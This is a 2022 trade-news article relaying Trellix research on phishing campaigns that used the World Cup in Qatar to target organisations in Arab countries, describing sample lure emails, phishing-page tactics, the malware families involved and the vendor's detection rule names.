HOME
NEWS

Email Cyberattacks on Arab Countries Rise in Lead to Global Football Tournament


By VARINDIA - 2022-11-21
Email Cyberattacks on Arab Countries Rise in Lead to Global Football Tournament

By: Daksh Kapur, Sparsh Jain
 

Global eyes are soon to be turned to the first global football tournament to be held in the Arab world, but malicious actors have already kicked off are World Cup-themed cyberattacks. Email security researchers from the Trellix Advanced Research Center have found attackers to be leveraging FIFA and football-based campaigns to target organizations in Arab countries. It is a common practice for attackers to utilize the important/popular events as a part of the social engineering tactics and particularly target the organizations which are related to event and more promising victim for the attack.


As seen in the above graph, the volume of malicious emails in Arab Countries was observed to have increased by 100% in the month of October. As the host-country and the affiliated organizations prepare for the event, attackers take advantage of employee’s busy schedule which increases the chances of human error and victim interacting with the attack vector. The aim of such attacks can be variable like financial fraud, credential harvesting, data exfiltration, surveillance, or damage to the country’s/organization’s reputation.

 

Malicious Emails

Trellix Advanced Research Center researchers caught various emails utilizing the football tournament as an initial attack vector. The following are cases of samples found in the wild:

Sample 1: Pretends to be from FIFA TMS helpdesk, and the email body shows a fake alert notification regarding the de-activation of two factor authentication and contains a hyperlink which redirects the user to a phishing page.

Sample 2: Attempts to impersonate David Firisua, the team manager for Auckland City FC, and seeks confirmation of a payment made to the receiver's account in reference to FIFA. It also contains a hyperlink to a customized phishing page of trusted brand.

Sample 3: Impersonates the FIFA ticketing office and conveys a payment issue for the victim to urgently resolve. It also contains a html attachment which redirects the user to a customized phishing page.

Sample 4: A fake legal notification informing the recipient about a ban implemented by FIFA from registering new players to create a sense of urgency. It also contains a html attachment which redirects the user to a customized phishing page.

Sample 5: A fake file notification set in the WeTransfer’s template. It attempts to impersonate the Players Status Department and send victims a legal notice regarding delayed legal fees. It contains a link which redirects the user to a malicious website either delivering malware or hosting a phishing page.

Sample 6: Snoonu, the official food delivery partner of the World Cup is spoofed, offering fake free tickets to those who register. It contains a malicious xlsm attachment. The usage of such trusted organizations' names and their templates makes the user fall for such attacks easily.

 

These are just some of the campaigns we have found. Trellix Email Security was able to successfully detect multiple campaigns and safeguard users from any kind of breach or loss tied to these campaigns.

 


 

Figure 3 – Football-Themed Malicious Emails

 

Malicious URLs

The following are some of the tournament-themed phishing pages caught by Trellix Email Security being distributed in the wild:

 

Customized pages that appear to be genuine and look like the legitimate pages they spoof make it difficult for the victim to recognize any suspicious activity.

Usage of multiple phishing kits where the post URL is either obfuscated, Base64 encoded or present in the ajax request instead of form action tags.

Credentials are posted to a PHP script hosted on the server managed by the attacker.

Figure 4 – Tournament-Themed Malicious URLs

 

Malware

Trellix solutions have identified several malware families being used to target Arab countries. The top five malware families based on the volume of the attacks include:

Qakbot: An information stealer and banking Trojan with backdoor capabilities. It inserts malicious replies into the middle of existing email conversations, using the compromised accounts of other infection victims.

Emotet: An advanced Trojan primarily spread via phishing email attachments and links that, once clicked, launch a payload. The goal is to access foreign devices and spy on sensitive confidential data.

Formbook: An infostealer malware which is used to steal several types of data from infected systems, including credentials cached in web browsers, screenshots, and keystrokes. It can also act as a downloader, enabling it to download and execute additional malicious files.

Remcos: A Remote Access Software used to remotely control computers, once installed, opens a backdoor on the computer, granting full access to the remote user.

QuadAgent: A PowerShell backdoor, and another tool used by the OilRig group to perform attacks on targeted machines.

 

Figure 5 – Top 5 Malware Families Used to Target Arab Countries

 

Indicators of compromise

 

The following link contains examples of malicious URLs, binaries and email addresses used in the recent campaigns targeting Arab Countries.

Trellix protection

Trellix Email Security provides reliable detection from such campaigns by preventing emails from ever reaching your system. In addition, Trellix also detects campaigns on other levels like network, URL and binary to provide complete protection to our customers.

The following are some of the many rules authored by us to detect such campaigns:

 

FE_Trojan_HTM_Phish_246

Phishing_Null_Content_33

Phishing_Qbot

Phishing_Qbot_Zip_Expiry

 

Conclusion

As the much-awaited football tournament comes close, cybercriminals are expected to leverage every opportunity they get to capitalize on news trends, ticket demands, human errors due to the busy schedule and more in order to deliver a cyberattack. We anticipate these attacks to continue through January 2023 and would advise everyone to stay vigilant of any attack vectors. The organizations which are directly related to the event are advised to stay extra-vigilant as they would be the most promising targets for such attacks.

See What’s Next in Tech With the Fast Forward Newsletter

SECURITY
View All
Zscaler announces AI innovations to its Data Protection Platform
Technology

Zscaler announces AI innovations to its Data Protection Platform

by VARINDIA 2024-05-20
SHIELD to enhance Swiggy’s fraud prevention and detection capabilities
Technology

SHIELD to enhance Swiggy’s fraud prevention and detection capabilities

by VARINDIA 2024-05-20
Axis Communications announces its first thermometric camera designed for Zone/Division 2
Technology

Axis Communications announces its first thermometric camera designed for Zone/Division 2

by VARINDIA 2024-05-20
SOFTWARE
View All
Hitachi Vantara and Veeam announce Global Strategic Alliance
Technology

Hitachi Vantara and Veeam announce Global Strategic Alliance

by VARINDIA 2024-05-16
Adobe launches Acrobat AI Assistant for the Enterprise
Technology

Adobe launches Acrobat AI Assistant for the Enterprise

by VARINDIA 2024-05-11
Oracle Database 23ai offers the power of AI to Enterprise Data and Applications
Technology

Oracle Database 23ai offers the power of AI to Enterprise Data and Applications

by VARINDIA 2024-05-10
START - UP
View All
Data Subject Access Request is an integrated module within ID-REDACT®
Technology

Data Subject Access Request is an integrated module within ID-REDACT®

by VARINDIA 2024-04-30
SiMa.ai Secures $70M Funds from Maverick Capital
Technology

SiMa.ai Secures $70M Funds from Maverick Capital

by VARINDIA 2024-04-05
Sarvam AI collaborates with Microsoft to bring its Indic voice LLM to Azure
Technology

Sarvam AI collaborates with Microsoft to bring its Indic voice LLM to Azure

by VARINDIA 2024-02-08

Tweets From @varindiamag

CIO - SPEAK
Automation has the potential to greatly improve efficiency and production

Automation has the potential to greatly improve efficiency and production

by VARINDIA
Various approaches are followed to enhance efficiency, productivity, and cost-effectiveness

Various approaches are followed to enhance efficiency, productivity, and cost-effectiveness

by VARINDIA
Technology can be leveraged in several ways to boost efficiency, productivity and reduce cost

Technology can be leveraged in several ways to boost efficiency, productivity and reduce cost

by VARINDIA
Start-Up and Unicorn Ecosystem
GoDaddy harnesses AI power for new domain name recommendations

GoDaddy harnesses AI power for new domain name recommendations

by VARINDIA
UAE’s du Telecom selects STL as a strategic fibre partner

UAE’s du Telecom selects STL as a strategic fibre partner

by VARINDIA
JLR and Dassault Systèmes extend partnership for All Vehicle Programs worldwide

JLR and Dassault Systèmes extend partnership for All Vehicle Programs worldwide

by VARINDIA
Rapyder partners with AWS to accelerate Generative AI led innovation

Rapyder partners with AWS to accelerate Generative AI led innovation

by VARINDIA
ManageEngine integrates its SIEM solution with Constella Intelligence

ManageEngine integrates its SIEM solution with Constella Intelligence

by VARINDIA
Elastic replaces traditional SIEM game with AI-driven security analytics

Elastic replaces traditional SIEM game with AI-driven security analytics

by VARINDIA
Infosys and ServiceNow to transform customer experiences with generative AI-powered solutions

Infosys and ServiceNow to transform customer experiences with generative AI-powered solutions

by VARINDIA
Crayon Software Experts India inaugurates its ISV Incubation Center in Kolkata

Crayon Software Experts India inaugurates its ISV Incubation Center in Kolkata

by VARINDIA
Dassault Systèmes to accelerate EV charging infrastructure development in India

Dassault Systèmes to accelerate EV charging infrastructure development in India

by VARINDIA
Tech Mahindra and Atento to deliver GenAI powered business transformation services

Tech Mahindra and Atento to deliver GenAI powered business transformation services

by VARINDIA